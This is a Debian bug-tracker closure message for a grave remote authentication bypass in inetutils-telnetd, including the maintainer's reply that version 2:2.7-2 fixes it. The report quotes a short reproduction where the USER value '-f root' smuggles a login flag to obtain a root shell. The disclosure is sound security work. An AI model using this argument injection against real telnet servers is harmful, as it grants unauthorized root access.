Your message dated Wed, 21 Jan 2026 14:36:01 +0100
with message-id <[email protected]>
and subject line Re: Bug#1126047: inetutils-telnetd: remote authentication
bypass
has caused the Debian Bug report #1126047,
regarding inetutils-telnetd: remote authentication bypass
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)
--
1126047: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1126047
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: inetutils-telnetd
Version: 2:2.7-1
Severity: grave
Justification: user security hole
From
https://seclists.org/oss-sec/2026/q1/89
root@kaka:~ sudo apt-get install inetutils-telnetd telnet
root@kaka:~ sudo sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf
root@kaka:~ sudo /etc/init.d/inetutils-inetd start
root@kaka:~ USER='-f root' telnet -a localhost
...
root@kaka:~#
-- System Information:
Debian Release: forky/sid
APT prefers testing
APT policy: (500, 'testing')
Architecture: amd64 (x86_64)
Kernel: Linux 6.17.13+deb14-amd64 (SMP w/12 CPU threads; PREEMPT)
Locale: LANG=en_CA.UTF-8, LC_CTYPE=en_CA.UTF-8 (charmap=UTF-8),
LANGUAGE=en_CA:en
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled
Versions of packages inetutils-telnetd depends on:
pn inetutils-inetd | inet-superserver <none>
ii libc6 2.42-9
ii libcom-err2 1.47.2-3+b8
ii libk5crypto3 1.22.1-2
ii libkrb5-3 1.22.1-2
ii libtinfo6 6.6+20251231-1
ii login 1:4.16.0-2+really2.41.3-2
ii netbase 6.5
ii systemd-sysv 259-1
inetutils-telnetd recommends no packages.
inetutils-telnetd suggests no packages.
--- End Message ---
--- Begin Message ---
Version: 2:2.7-2
On Wed, 2026-01-21 at 07:36:57 +0900, David Bremner wrote:
> Package: inetutils-telnetd
> Version: 2:2.7-1
> Severity: grave
> Justification: user security hole
> From
>
> https://seclists.org/oss-sec/2026/q1/89
>
>
> root@kaka:~ sudo apt-get install inetutils-telnetd telnet
> root@kaka:~ sudo sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf
> root@kaka:~ sudo /etc/init.d/inetutils-inetd start
> root@kaka:~ USER='-f root' telnet -a localhost
> ...
> root@kaka:~#
Right, was meaning to file a report to track this, thanks for doing that!
This was fixed yesterday with this upload:
,--
inetutils (2:2.7-2) unstable; urgency=medium
* Fix remote authentication by-pass in telnetd.
GNU InetUtils Security Advisory:
<https://lists.gnu.org/archive/html/bug-inetutils/2026-01/msg00004.html>
* Switch to Standards-Version 4.7.3 (no changes needed).
-- Guillem Jover <[email protected]> Tue, 20 Jan 2026 15:53:22 +0100
`---
I need to discuss with the security team how to proceed.
Thanks,
Guillem
--- End Message ---
